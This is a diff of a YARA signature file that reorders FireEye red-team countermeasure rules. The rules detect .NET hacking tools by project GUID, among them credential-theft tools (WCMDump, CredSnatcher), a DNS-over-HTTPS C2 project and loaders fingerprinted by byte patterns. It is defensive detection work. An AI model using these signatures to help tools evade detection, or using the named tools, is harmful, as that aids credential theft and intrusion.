+		logic_hash = "8df328663a813ca0a6864ae0503cbc1b03cfdf839215b9b4f2bb7962adf09bf8"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 2
 
 	strings:
-		$typelibguid0 = "e9e452d4-9e58-44ff-ba2d-01b158dda9bb" ascii nocase wide
+		$typelibguid0 = "cf27abf4-ef35-46cd-8d0c-756630c686f1" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project."
 		author = "FireEye"
-		id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41"
+		id = "22796ccb-a01e-59d8-8c3a-6cbb62899940"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1"
+		logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 2
+		rev = 1
 
 	strings:
-		$typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide
+		$typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_PRAT_1 : FILE
+rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'prat' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project."
 		author = "FireEye"
-		id = "4a876eb0-ed2f-5ef2-a9b3-ba728b07c8c0"
+		id = "0d8f7495-4748-577d-8ef2-ccc4829fc165"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_PRAT_1.yar#L4-L18"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "d707f017b56b0a873f1edca085ad40fc70cb24e8c9844f377bc28871a941d0b4"
+		logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91"
 		score = 75
-		quality = 67
+		quality = 73
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "7d1219fb-a954-49a7-96c9-df9e6429a8c7" ascii nocase wide
-		$typelibguid1 = "bc1157c2-aa6d-46f8-8d73-068fc08a6706" ascii nocase wide
-		$typelibguid2 = "c602fae2-b831-41e2-b5f8-d4df6e3255df" ascii nocase wide
-		$typelibguid3 = "dfaa0b7d-6184-4a9a-9eeb-c08622d15801" ascii nocase wide
+		$typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Wcmdump_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'WCMDump' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project."
 		author = "FireEye"
-		id = "22796ccb-a01e-59d8-8c3a-6cbb62899940"
+		id = "c48835a7-06fe-5b30-be4d-086d98dc7a21"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_WCMDump_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "9fbf53e551342695b306b10f30a3fe32dff359bd70e84e1fa1f190772f5dcbe3"
+		logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "21e322f2-4586-4aeb-b1ed-d240e2a79e19" ascii nocase wide
+		$typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
@@ -72685,101 +73005,127 @@ rule FIREEYE_RT_APT_Hacktool_MSIL_MODIFIEDSHARPVIEW_1 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_DNSOVERHTTPS_C2_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public 'DoHC2' External C2 project."
 		author = "FireEye"
-		id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8"
+		id = "ee71be6c-e3c8-5365-9f32-157f00066c49"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_DNSOVERHTTPS_C2_1.yar#L4-L16"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2"
+		logic_hash = "a482161bbd8e249977f28466ff1381d4693495f8b8ccd9183ae4fde1ec1471eb"
 		score = 75
-		quality = 73
+		quality = 71
 		tags = "FILE"
-		rev = 3
+		rev = 2
 
 	strings:
-		$typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide
+		$typelibguid0 = "5d9515d0-df67-40ed-a6b2-6619620ef0ef" ascii nocase wide
+		$typelibguid1 = "7266acbb-b10d-4873-9b99-12d2043b1d4e" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Credtheft_MSIL_Credsnatcher_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDNS_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CredSnatcher' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdns' project."
 		author = "FireEye"
-		id = "0d8f7495-4748-577d-8ef2-ccc4829fc165"
+		id = "db6b45be-f42f-5d0f-b50a-32e7a2cbfce6"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/CredTheft_MSIL_CredSnatcher_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDNS_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "2c86be1bcf29bcb2c167f9248dee0ab4a5a5c6740fb1f18784ee2e380176df91"
+		logic_hash = "bab36f9b1532c3b24c2aea2907006820ed7cf1c90dae7a8138962e14ac9eff55"
 		score = 75
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 2
 
 	strings:
-		$typelibguid0 = "370b4d21-09d0-433f-b7e4-4ebdd79948ec" ascii nocase wide
+		$typelibguid0 = "d888cec8-7562-40e9-9c76-2bb9e43bb634" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNATIVEZIPPER_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPZIPLIBZIPPER_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpnativezipper' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpziplibzipper' project."
 		author = "FireEye"
-		id = "c48835a7-06fe-5b30-be4d-086d98dc7a21"
+		id = "392a52be-29ae-58e1-b517-1ab34a1e1fb8"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPNATIVEZIPPER_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPZIPLIBZIPPER_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "fa54375b21abbb613e695f70a15233575fbe6e0536716544bb3b527f5e3ed8c6"
+		logic_hash = "19354edb91a0d79fdf79437f7247bcf155514db40340af91a3320b556dc2e4c2"
 		score = 75
 		quality = 73
 		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid0 = "de5536db-9a35-4e06-bc75-128713ea6d27" ascii nocase wide
+		$typelibguid0 = "485ba350-59c4-4932-a4c1-c96ffec511ef" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSQLCLIENT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpsqlclient' project."
 		author = "FireEye"
-		id = "13f4e3ea-1e36-5fad-9197-66511d6f026a"
+		id = "4d526c36-f56f-53cf-9bdf-b7a15619eb41"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPSQLCLIENT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23"
+		logic_hash = "bc79f80582f4fadecf54d926abdcf61694224654ba5075203f0d1123cf11afc1"
 		score = 75
 		quality = 73
 		tags = "FILE"
+		rev = 2
+
+	strings:
+		$typelibguid0 = "13ed03cd-7430-410d-a069-cf377165fbfd" ascii nocase wide
+
+	condition:
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+}
+rule FIREEYE_RT_APT_Hacktool_MSIL_REDTEAMMATERIALS_1 : FILE
+{
+	meta:
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'red_team_materials' project."
+		author = "FireEye"
+		id = "272cd3e9-884a-566b-ae90-4a79ee726a8d"
+		date = "2020-12-09"
+		modified = "2020-12-09"
+		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_REDTEAMMATERIALS_1.yar#L4-L16"
+		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "ca54a1e8335c4256295fc643f5d31eae2e89f020dc7a9b571c4772edaad08022"
+		score = 75
+		quality = 71
+		tags = "FILE"
 		rev = 3
 
 	strings:
-		$typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide
+		$typelibguid0 = "86c95a99-a2d6-4ebe-ad5f-9885b06eab12" ascii nocase wide
+		$typelibguid1 = "e06f1411-c7f8-4538-bbb9-46c928732245" ascii nocase wide
 
 	condition:
-		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
 rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE
 {
@@ -72805,33 +73151,29 @@ rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPNFS_1 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Loader_Win_Generic_20 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPDACL_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'sharpdacl' project."
 		author = "FireEye"
-		id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49"
-		date = "2020-12-02"
-		date = "2020-12-02"
+		id = "13f4e3ea-1e36-5fad-9197-66511d6f026a"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/production/yara/APT_HackTool_MSIL_SHARPDACL_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "5125979110847d35a338caac6bff2aa8"
-		logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6"
+		hash = "dd8805d0e470e59b829d98397507d8c2"
+		logic_hash = "5f44ec5ddded18fb3a9132b469b2fe7ccbffb3f907325485f0f72fe3d6bbfa23"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
-		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
-		$si1 = "VirtualProtect" fullword
-		$si2 = "malloc" fullword
+		$typelibguid0 = "b3c17fb5-5d5a-4b14-af3c-87a9aa941457" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
+		filesize < 10MB and ( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
 rule FIREEYE_RT_Loader_Win_Generic_19 : FILE
 {
@@ -72892,483 +73234,625 @@ rule FIREEYE_RT_Loader_MSIL_Generic_1 : FILE
 	condition:
 		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and $MSIL and all of them
 }
-rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE
+rule FIREEYE_RT_Loader_Win_Generic_20 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "e4325f11-103c-5893-8978-9a72f7ca6105"
-		date = "2020-12-09"
+		id = "d1d3eff8-d12e-53f6-8c30-06ecedaf3f49"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/UNCATEGORIZED/supplemental/yara/Loader_Win_Generic_20.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7"
-		score = 50
-		quality = 73
+		hash = "5125979110847d35a338caac6bff2aa8"
+		logic_hash = "9611aed2b4e4278d40254cb5c4fe94a458cfa19f10e6fe888bc7ceb166669cc6"
+		score = 75
+		quality = 75
 		tags = "FILE"
-		rev = 3
+		rev = 1
 
 	strings:
-		$typelibguid0 = "751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide
+		$s0 = { 8B [1-16] 89 [1-16] E8 [4-32] F3 A4 [0-16] 89 [1-8] E8 }
+		$s2 = { 83 EC [4-24] 00 10 00 00 [4-24] C7 44 24 ?? ?? 00 00 00 [0-8] FF 15 [4-24] 89 [1-4] 89 [1-4] 89 [1-8] FF 15 [4-16] 3? ?? 7? [4-24] 20 00 00 00 [4-24] FF 15 [4-32] F3 A5 }
+		$si1 = "VirtualProtect" fullword
+		$si2 = "malloc" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_Hacktool_MSIL_Corehound_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_GPOHUNT_1 : FILE
 {
 	meta:
-		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'CoreHound' project."
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the 'gpohunt' project."
 		author = "FireEye"
-		id = "8c914b34-3e3d-53ae-a5e4-9dbfdff45a24"
+		id = "e4325f11-103c-5893-8978-9a72f7ca6105"
 		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/COREHOUND/production/yara/HackTool_MSIL_CoreHound_1.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/GPOHUNT/production/yara/APT_HackTool_MSIL_GPOHUNT_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
 		hash = "dd8805d0e470e59b829d98397507d8c2"
-		logic_hash = "b0f759709428d5c9404507a13259bf85cb8c405d38b807539098f7cc871023d8"
-		score = 75
+		logic_hash = "4b1f175dac123a6340494e2730d66c718478fb7618dc5611315992ed33e0f6c7"
+		score = 50
 		quality = 73
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$typelibguid0 = "1fff2aee-a540-4613-94ee-4f208b30c599" ascii nocase wide
+		$typelibguid0 = "751a9270-2de0-4c81-9e29-872cd6378303" ascii nocase wide
 
 	condition:
 		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
 }
-rule FIREEYE_RT_Hunting_B64Engine_Dotnettojscript_Dos
+rule FIREEYE_RT_APT_Loader_Win32_Dshell_2 : FILE
 {
 	meta:
-		description = "This file may enclude a Base64 encoded .NET executable. This technique is used by the project DotNetToJScript which is used by many malware families including GadgetToJScript."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "24c9c259-9bb9-5f46-9278-4fa20eb3c8c4"
-		date = "2020-12-09"
+		id = "ae34d547-d979-5ce2-bcf8-a5b4e4567de3"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_B64Engine_DotNetToJScript_Dos.yar#L4-L15"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_2.yar#L4-L21"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7af24305a409a2b8f83ece27bb0f7900"
-		logic_hash = "e2afb43af469f8ae02f6fd21db6dbd45c997fb003e3aeeaa0d4ff3e85c64159a"
-		score = 50
+		hash = "590d98bb74879b52b97d8a158af912af"
+		logic_hash = "958ff45add46c0a43e839e8007c1d9296ee89ddd8c045b8ec6b031b225207a6c"
+		score = 75
 		quality = 75
-		tags = ""
-		rev = 1
+		tags = "FILE"
+		rev = 2
 
 	strings:
-		$b64_mz = "AAC4AAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAAOH7oOALQJzSG4AUzNIVRoaXMgcHJvZ3JhbSBjYW5ub3QgYmUgcnVuIGluIERPUyBtb2RlLg0NCiQAAAAAAAAAUEU"
+		$sb1 = { 6A 40 68 00 30 00 00 [4-32] E8 [4-8] 50 [0-16] E8 [4-150] 6A FF [1-32] 6A 00 6A 00 5? 6A 00 6A 00 [0-32] E8 [4] 50 }
+		$ss1 = "\x00CreateThread\x00"
+		$ss2 = "base64.d" fullword
+		$ss3 = "core.sys.windows" fullword
+		$ss4 = "C:\\Users\\config.ini" fullword
+		$ss5 = "Invalid config file" fullword
 
 	condition:
-		$b64_mz
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule FIREEYE_RT_Hunting_Gadgettojscript_1
+rule FIREEYE_RT_APT_Loader_Win32_Dshell_3 : FILE
 {
 	meta:
-		description = "This rule is looking for B64 offsets of LazyNetToJscriptLoader which is a namespace specific to the internal version of the GadgetToJScript tooling."
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "76c932e0-55b3-56ef-bab6-eb6997b51ee7"
-		date = "2020-12-09"
+		id = "6b6fccef-ac93-5f1b-b9b6-c2d3ee4d8da7"
+		date = "2020-11-27"
+		date = "2020-11-27"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/G2JS/production/yara/Hunting_GadgetToJScript_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/DSHELL/production/yara/APT_Loader_Win32_DShell_3.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "7af24305a409a2b8f83ece27bb0f7900"
-		logic_hash = "a880c20e61376dacd4e3a04f2cf065f19067c29371180b1dec186172cadf9564"
-		score = 50
+		hash = "12c3566761495b8353f67298f15b882c"
+		logic_hash = "ec2a8b0abc6cb6d1861199b892fbe84782b42babb08e3ea203d10ab17ff7a20a"
+		score = 75
 		quality = 75
-		tags = ""
-		rev = 4
+		tags = "FILE"
+		rev = 1
 
 	strings:
